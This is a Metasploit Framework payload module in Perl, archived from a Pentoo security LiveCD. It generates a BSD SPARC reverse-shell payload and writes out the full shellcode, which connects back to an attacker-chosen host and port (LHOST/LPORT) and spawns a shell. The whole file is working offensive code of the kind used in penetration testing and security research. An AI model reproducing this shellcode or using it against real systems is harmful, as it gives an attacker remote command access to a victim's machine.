home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / bsd_sparc_reverse.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  73 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::bsd_sparc_reverse;
  11.  
  12. use base 'Msf::PayloadComponent::ReverseConnection';
  13. use strict;
  14. use Pex::SPARC;
  15.  
  16. my $info =
  17. {
  18.   'Name'         => 'BSD SPARC Reverse Shell',
  19.   'Version'      => '$Revision: 1.4 $',
  20.   'Description'  => 'Connect back to attacker and spawn a shell',
  21.   'Authors'      => [ 'vlad902 <vlad902 [at] gmail.com>', ],
  22.   'Arch'         => [ 'sparc' ],
  23.   'Priv'         => 0,
  24.   'OS'           => [ 'bsd' ],
  25.   'Size'         => '',
  26. };
  27.  
  28. sub new {
  29.   my $class = shift;
  30.   my $hash = @_ ? shift : { };
  31.   $hash = $class->MergeHashRec($hash, {'Info' => $info});
  32.   my $self = $class->SUPER::new($hash, @_);
  33.  
  34.   $self->_Info->{'Size'} = $self->_GenSize;
  35.   return($self);
  36. }
  37.  
  38. sub Build {
  39.   my $self = shift;
  40.   return($self->Generate($self->GetVar('LHOST'), $self->GetVar('LPORT')));
  41. }
  42.  
  43. sub Generate {
  44.   my $self = shift;
  45.   my $host = shift;
  46.   my $port = shift;
  47.  
  48.   my $host_bin = unpack("N", gethostbyname($host));
  49.  
  50.   my $shellcode =
  51.     "\x9c\x2b\xa0\x07\x94\x1a\xc0\x0b\x92\x10\x20\x01\x90\x10\x20\x02".
  52.     "\x82\x10\x20\x61\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x92\x10\x20\x03".
  53.     "\x92\xa2\x60\x01\x82\x10\x20\x5a\x91\xd0\x20\x08\x12\xbf\xff\xfd".
  54.     "\xd0\x03\xbf\xf8".
  55.     Pex::SPARC::Set(0xff020000 | $port, "l0").
  56.     Pex::SPARC::Set($host_bin, "l1").
  57.     "\xe0\x3b\xbf\xf0\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\x62".
  58.     "\x91\xd0\x20\x08\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e".
  59.     "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0".
  60.     "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";
  61.  
  62.  
  63.   return $shellcode;
  64. }
  65.  
  66. sub _GenSize {
  67.   my $self = shift;
  68.   my $bin = $self->Generate('127.0.0.1', 4444);
  69.   return(length($bin));
  70. }
  71.  
  72. 1;
  73.